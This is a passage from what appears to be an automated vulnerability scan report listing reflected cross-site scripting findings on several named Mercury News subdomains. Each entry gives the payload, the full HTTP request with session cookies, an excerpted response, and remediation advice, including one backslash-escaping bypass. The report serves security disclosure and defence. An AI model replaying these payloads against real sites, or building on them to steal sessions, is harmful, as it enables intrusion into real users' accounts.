This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /xml2ff9b"-alert(1)-"3afa300d7b5/poll-link HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:06:46 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:10 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22104
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a4083"-alert(1)-"6c029440ed4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /xml/poll-linka4083"-alert(1)-"6c029440ed4 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:07:00 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:24 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22104
1.81. http://forums.mercurynews.com/xml/poll-link [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://forums.mercurynews.com
Path: /xml/poll-link
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 82efb"-alert(1)-"694f25fe67 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /xml/poll-link?82efb"-alert(1)-"694f25fe67=1 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:06:34 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:06:58 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22070
The value of the version request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 454b3\'%3balert(1)//851c49b677b was submitted in the version parameter. This input was echoed as 454b3\\';alert(1)//851c49b677b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, then the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /FSI/Page.aspx?advid=200177&loc=53824&fsi=14784&version=Mercury454b3\'%3balert(1)//851c49b677b HTTP/1.1
Host: newspaperads.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; s_cc=true; ZZFLSH=29; location=53824; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 200 OK
Connection: close
Date: Mon, 15 Nov 2010 02:09:23 GMT
Server: Microsoft-IIS/6.0
X-Server-Name: HW3
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 48110
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/2000/REC-xhtml1-20000126/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" x ...[SNIP]... newspaperads.mercurynews.com';
The value of the rFreeForm request parameter is copied into an HTML comment. The payload c15c0--><script>alert(1)</script>f18d1ae576c was submitted in the rFreeForm parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /portlet/registration/html/info.jsp?rFreeForm=8101685c15c0--><script>alert(1)</script>f18d1ae576c HTTP/1.1
Host: secure.www.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<html><head><script><!-- window.focus(); //--></script><link type="text/css" rel="stylesheet" href='https://secure.extras.mnginteractive.com/live/css/MNGiDefaultStyles.css'><script> function o ...[SNIP]... <!-- BEGIN FREEFORM RENDER, ID 8101685c15c0--><script>alert(1)</script>f18d1ae576c --> ...[SNIP]...
The value of the rPage request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6fb02</script><script>alert(1)</script>47f9d8515fe was submitted in the rPage parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /registration/?rPage=login6fb02</script><script>alert(1)</script>47f9d8515fe&url=http%3A%2F%2Fwww.mercurynews.com%2F&eRightsSessionExpired=true HTTP/1.1
Host: secure.www.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.0 404 Not Found
Date: Mon, 15 Nov 2010 02:09:38 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: JSESSIONID=0QISC2X0JL2UMCUUCBWCFFI; path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Content-Language: en-US
Connection: close
Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Registration'><title>Registration - San Jose Mercury News</title><!-- get profile info -->< ...[SNIP]... rBrand = getBrand2(s_account); var PageName = "Registration"; var SectionName = "Registration"; var ArticleTitle = "null"; var FriendlyName = "Registration: login6fb02</script><script>alert(1)</script>47f9d8515fe"; var domainName = getDomainName(); userObj = new omniObj(); userObj.load(); userObj.update(); userObj.save(); /* You may give each page an identifying name, server, and cha ...[SNIP]...
The value of the url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 586df"><script>alert(1)</script>cb76424f007 was submitted in the url parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /registration/?rPage=login&url=http%3A%2F%2Fwww.mercurynews.com%2F586df"><script>alert(1)</script>cb76424f007&eRightsSessionExpired=true HTTP/1.1
Host: secure.www.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.0 200 OK
Date: Mon, 15 Nov 2010 02:09:39 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: JSESSIONID=XBSY2AYHL45GQCUUCAWSFEY; path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Content-Language: en-US
Connection: close
Content-Type: text/html;charset=UTF-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Registration'><title>Registration - San Jose Mercury News</title><!-- get profile info -->< ...[SNIP]... <a href="/registration?rPage=register&url=http://www.mercurynews.com/586df"><script>alert(1)</script>cb76424f007&register=yes"> ...[SNIP]...
The value of the brand request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be8ab"><script>alert(1)</script>bb838291dac was submitted in the brand parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /cgi-bin/findweather/getForecast?brand=mercurynewsbe8ab"><script>alert(1)</script>bb838291dac&query=san+jose&searchbutton.x=8&searchbutton.y=8&searchbutton=Search HTTP/1.1
Host: weather.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; ASC=1289776044:1; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 02:10:46 GMT
Server: Apache/1.3.33 (Unix) PHP/4.4.0
X-CreationTime: 0.060
Set-Cookie: ASC=1289787046:2; path=/; expires=Fri, 01-Jan-2020 00:00:00 GMT; domain=.wunderground.com
Connection: close
Content-Type: text/html
Content-Length: 25776
<HTML> <head> <title>Weather </title> </head> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <meta HTTP-EQUIV="Pragma" CONTENT"no-cache"> <title>San Jose Mercury N ...[SNIP]... <a href="/auto/mercurynewsbe8ab"><script>alert(1)</script>bb838291dac/CA/San_Jose.html" OnClick='Set_Cookie( "DefLoc", "95101", 365, "/", "mercurynews.com", "");'> ...[SNIP]...
The value of the c request parameter is copied into the HTML document as plain text between tags. The payload f07b5<script>alert(1)</script>7962c56bc63 was submitted in the c parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the n request parameter is copied into the HTML document as plain text between tags. The payload 1f326<script>alert(1)</script>42f179eed7a was submitted in the n parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the s request parameter is copied into the HTML document as plain text between tags. The payload a6ad2<script>alert(1)</script>0e367d1dc82 was submitted in the s parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the t request parameter is copied into the HTML document as plain text between tags. The payload a036d<script>alert(1)</script>226d850a15 was submitted in the t parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.